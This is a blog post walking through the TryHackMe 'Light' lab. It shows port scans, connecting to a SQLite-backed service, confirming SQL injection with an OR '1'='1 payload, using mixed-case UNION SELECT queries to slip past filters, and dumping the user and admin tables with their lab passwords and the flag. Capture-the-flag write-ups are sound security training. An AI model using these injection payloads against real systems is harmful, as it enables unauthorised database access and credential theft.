

<!DOCTYPE html>
<html lang="en" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/Website/favicon.png">
  <link rel="icon" href="/img/Website/favicon.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="THM - Light Walkthrough">
  <meta name="author" content="MelioD4rk">
  <meta name="keywords" content="">
  <meta name="description" content="THM - Light Walkthrough">
<meta property="og:type" content="article">
<meta property="og:title" content="Light">
<meta property="og:url" content="http://meliod4rk.github.io/2025/03/03/Light/index.html">
<meta property="og:site_name" content="H4CK1NGT1M3">
<meta property="og:description" content="THM - Light Walkthrough">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://meliod4rk.github.io/img/Walkthrough/THM/Light/smokey_connection.png">
<meta property="og:image" content="http://meliod4rk.github.io/img/Walkthrough/THM/Light/filters_bypass.png">
<meta property="og:image" content="http://meliod4rk.github.io/img/Walkthrough/THM/Light/tables.png">
<meta property="og:image" content="http://meliod4rk.github.io/img/Walkthrough/THM/Light/dump_usertable.png">
<meta property="og:image" content="http://meliod4rk.github.io/img/Walkthrough/THM/Light/dump_admintable.png">
<meta property="og:image" content="http://meliod4rk.github.io/img/Walkthrough/THM/Light/task1_result.png">
<meta property="article:published_time" content="2025-03-03T11:02:52.000Z">
<meta property="article:modified_time" content="2025-03-03T17:35:09.904Z">
<meta property="article:author" content="MelioD4rk">
<meta property="article:tag" content="Walkthrough">
<meta property="article:tag" content="THM">
<meta property="article:tag" content="Lab">
<meta property="article:tag" content="SQLI">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="http://meliod4rk.github.io/img/Walkthrough/THM/Light/smokey_connection.png">
  
  <title>Light - H4CK1NGT1M3</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3/dist/jquery.fancybox.min.css" />
  


<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"meliod4rk.github.io","root":"/","version":"1.8.12","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/Website/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname"}},"search_path":"/local-search.xml"};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.4.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>H4CK1NGT1M3</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                Home
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                Archives
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                Categories
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                Tags
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                About
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              &nbsp;<i class="iconfont icon-search"></i>&nbsp;
            </a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('https://tryhackme-images.s3.amazonaws.com/room-icons/618b3fa52f0acc0061fb0172-1737140605838') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="Light">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2025-03-03 12:02" pubdate>
        March 3, 2025 pm
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      3.2k wc
    </span>
  

  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">Light</h1>
            
            <div class="markdown-body">
              <h1 id="THM-Light-Walkthrough"><a href="#THM-Light-Walkthrough" class="headerlink" title="THM - Light (Walkthrough)"></a>THM - Light (Walkthrough)</h1><h2 id="Known-Information"><a href="#Known-Information" class="headerlink" title="Known Information"></a>Known Information</h2><ul>
<li>DBMS: Light  </li>
<li>Running Port: <code>1337</code>  </li>
<li>Connection Method: <code>nc MACHINE_IP 1337</code>  </li>
<li>Username: <code>smokey</code>  </li>
</ul>
<h2 id="Task-1-Welcome"><a href="#Task-1-Welcome" class="headerlink" title="Task 1 - Welcome"></a>Task 1 - Welcome</h2><h3 id="1-Scan-for-Open-Ports"><a href="#1-Scan-for-Open-Ports" class="headerlink" title="1. Scan for Open Ports"></a>1. Scan for Open Ports</h3><p>First, let’s check if there are any other open ports:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">nmap -p- -sS --min-rate 5000 --open -vvv -Pn -n <span class="hljs-variable">$target_ip</span><br></code></pre></td></tr></table></figure>

<p>Output:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs bash">PORT     STATE SERVICE REASON<br>22/tcp   open  ssh     syn-ack ttl 63<br>1337/tcp open  waste   syn-ack ttl 63<br></code></pre></td></tr></table></figure>

<h3 id="2-Deep-Scan-of-Open-Ports"><a href="#2-Deep-Scan-of-Open-Ports" class="headerlink" title="2. Deep Scan of Open Ports"></a>2. Deep Scan of Open Ports</h3><p>Now that we have identified the open ports, let’s gather more information about them, such as OS details, service versions, and potential vulnerabilities using Nmap’s default enumeration scripts:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">nmap -sC -sV -p22,1337 <span class="hljs-variable">$target_ip</span><br></code></pre></td></tr></table></figure>

<p>In this case, we didn’t find anything particularly interesting.</p>
<h3 id="3-DBMS-Connection"><a href="#3-DBMS-Connection" class="headerlink" title="3. DBMS Connection"></a>3. DBMS Connection</h3><p>As mentioned in the description, I attempted to connect to the DBMS using:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">nc <span class="hljs-variable">$target_ip</span> 1337<br></code></pre></td></tr></table></figure>

<p>When we input the known username <code>smokey</code>, the DBMS responds with a password. However, we are unsure what the password is for at this stage. It’s important to take note of it for later use.</p>
<p><img src="/img/Walkthrough/THM/Light/smokey_connection.png" srcset="/img/Website/loading.gif" lazyload alt="Figure 1: Smokey Connection"></p>
<p>The first thing that came to my mind was to try these credentials for SSH access:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">ssh smokey@<span class="hljs-variable">$target_ip</span><br></code></pre></td></tr></table></figure>

<p>With the password:  </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">vYQ5ngPpw8AdUmL<br></code></pre></td></tr></table></figure>

<p>However, the login attempt was unsuccessful.</p>
<h3 id="4-Discovery-SQL-Injection-SQLi"><a href="#4-Discovery-SQL-Injection-SQLi" class="headerlink" title="4. Discovery - SQL Injection (SQLi)"></a>4. Discovery - SQL Injection (SQLi)</h3><p>The description of this CTF mentioned that we were testing something similar to a DBMS. Additionally, when we entered <code>Smokey</code> as input, we received a password.</p>
<p>If we consider how a database works and what kind of query could return something like the response we got, we might assume that our input is being used in the following query:</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">SELECT</span> password <span class="hljs-keyword">FROM</span> user_table <span class="hljs-keyword">WHERE</span> username <span class="hljs-operator">=</span> <span class="hljs-string">&#x27;&#123;user_input&#125;&#x27;</span>;<br></code></pre></td></tr></table></figure>

<p>We wanted to check if it was vulnerable to SQL Injection (SQLi), so we tried using a single quote (<code>&#39;</code>) as input and received the following error:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">Error: unrecognized token: &quot;&#x27;&#x27;&#x27; LIMIT 30&quot;<br></code></pre></td></tr></table></figure>

<p>Because of this, we now know that the backend query is something like:</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">SELECT</span> password <span class="hljs-keyword">FROM</span> user_table <span class="hljs-keyword">WHERE</span> username <span class="hljs-operator">=</span> <span class="hljs-string">&#x27;&#123;user_input&#125;&#x27;</span> LIMIT <span class="hljs-number">30</span>;<br></code></pre></td></tr></table></figure>

<p>With this in mind, when we tried <code>test&#39; OR &#39;1&#39;=&#39;1</code>, we obtained another password:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">tF8tj2o94WE4LKC<br></code></pre></td></tr></table></figure>

<p>Now, we <strong>know</strong> that this DBMS is vulnerable to SQL Injection.</p>
<p>Let’s move on to the <strong>exploitation</strong> phase of this vulnerability! :)</p>
<h3 id="5-Discovery-SQL-Injection-SQLi"><a href="#5-Discovery-SQL-Injection-SQLi" class="headerlink" title="5. Discovery - SQL Injection (SQLi)"></a>5. Discovery - SQL Injection (SQLi)</h3><p>Now is time to get information such as ddbb version, tables, columns, etc.<br>So, to do that, we will use some commands to get DBMS type and version:</p>
<table>
<thead>
<tr>
<th>Oracle</th>
<th><code>SELECT banner FROM v$versionSELECT version FROM v$instance</code></th>
</tr>
</thead>
<tbody><tr>
<td>Microsoft</td>
<td><code>SELECT @@version</code></td>
</tr>
<tr>
<td>PostgreSQL</td>
<td><code>SELECT version()</code></td>
</tr>
<tr>
<td>MySQL</td>
<td><code>SELECT @@version</code></td>
</tr>
<tr>
<td>SQLite</td>
<td><code>SELECT sqlite_version()</code></td>
</tr>
</tbody></table>
<p>As shown on following image, we tested the system to find which sql command can bypass the filters and get de SQLite DBMS version:</p>
<p>(insert photo)<br><img src="/img/Walkthrough/THM/Light/filters_bypass.png" srcset="/img/Website/loading.gif" lazyload alt="Figure 2: Filters Bypass"></p>
<p>Jumping to the end of retries, this is the command i used to bypass filters and extract db_schema and list created tables on it and they attributes (i had to (escribir los comandos combinando mayusculas y minusculas -&gt; me gustaria saber el nombre tecnico de esta tecnica)):</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-string">&#x27; UniOn SeLeCt group_concat(sql) FROM sqlite_master&#x27;</span><br></code></pre></td></tr></table></figure>

<p><img src="/img/Walkthrough/THM/Light/tables.png" srcset="/img/Website/loading.gif" lazyload alt="Figure 3: DBMS table schema"></p>
<p>Finally, we could dump tables data with the following one:</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-string">&#x27; UniOn SeLeCt group_concat(&lt;column_name&gt;) FROM &lt;table_name&gt;&#x27;</span><br></code></pre></td></tr></table></figure>
<p><img src="/img/Walkthrough/THM/Light/dump_usertable.png" srcset="/img/Website/loading.gif" lazyload alt="Figure 4: Dump usertable"><br><img src="/img/Walkthrough/THM/Light/dump_admintable.png" srcset="/img/Website/loading.gif" lazyload alt="Figure 5: Dump admintable"></p>
<p>Thanks to above steps, we could understand results obtained by query command:</p>
<p><strong>usertable</strong></p>
<table>
<thead>
<tr>
<th>username</th>
<th>password</th>
</tr>
</thead>
<tbody><tr>
<td>alice</td>
<td>tF8tj2o94WE4LKC</td>
</tr>
<tr>
<td>rob</td>
<td>yAn4fPaF2qpCKpR</td>
</tr>
<tr>
<td>john</td>
<td>e74tqwRh2oApPo6</td>
</tr>
<tr>
<td>michael</td>
<td>7DV4dwA0g5FacRe</td>
</tr>
<tr>
<td>smokey</td>
<td>vYQ5ngPpw8AdUmL</td>
</tr>
<tr>
<td>hazel</td>
<td>EcSuU35WlVipjXG</td>
</tr>
<tr>
<td>ralph</td>
<td>YO1U9O1m52aJImA</td>
</tr>
<tr>
<td>steve</td>
<td>WObjufHX1foR8d7</td>
</tr>
</tbody></table>
<p><strong>admintable</strong></p>
<table>
<thead>
<tr>
<th>username</th>
<th>password</th>
</tr>
</thead>
<tbody><tr>
<td>TryHackMeAdmin</td>
<td>mamZtAuMlrsEy5bp6q17</td>
</tr>
<tr>
<td>flag</td>
<td>THM{SQLit3_InJ3cTion_is_SimplE_nO?}</td>
</tr>
</tbody></table>
<h3 id="6-Solution"><a href="#6-Solution" class="headerlink" title="6. Solution"></a>6. Solution</h3><p>Finally, with the gathered information, we could respond to thm ctf questions.<br><img src="/img/Walkthrough/THM/Light/task1_result.png" srcset="/img/Website/loading.gif" lazyload alt="Figure 6: Task 1 solution"></p>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/Walkthroughs/">Walkthroughs</a>
                    
                      <a class="hover-with-bg" href="/categories/Walkthroughs/THM/">THM</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/Walkthrough/">Walkthrough</a>
                    
                      <a class="hover-with-bg" href="/tags/THM/">THM</a>
                    
                      <a class="hover-with-bg" href="/tags/Lab/">Lab</a>
                    
                      <a class="hover-with-bg" href="/tags/SQLI/">SQLI</a>
                    
                  </div>
                
              </div>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2023/01/04/Steel-Mountain/">
                        <span class="hidden-mobile">Steel Mountain</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;TOC</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <i class="iconfont icon-github-fill"></i> <a href="https://github.com/MelioD4rk" target="_blank" rel="nofollow noopener"><span>MelioD4rk</span></a> 
  </div>
  

  

  
</footer>


  <!-- SCRIPTS -->
  
  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  <script  src="/js/local-search.js" ></script>



  
    <script  src="/js/img-lazyload.js" ></script>
  



  



  
    <script  src="https://cdn.jsdelivr.net/npm/tocbot@4/dist/tocbot.min.js" ></script>
  
  
    <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3/dist/jquery.fancybox.min.js" ></script>
  
  
    <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4/anchor.min.js" ></script>
  
  
    <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2/dist/clipboard.min.js" ></script>
  






  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
      typing(title)
      
    })(window, document);
  </script>















<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>


</body>
</html>
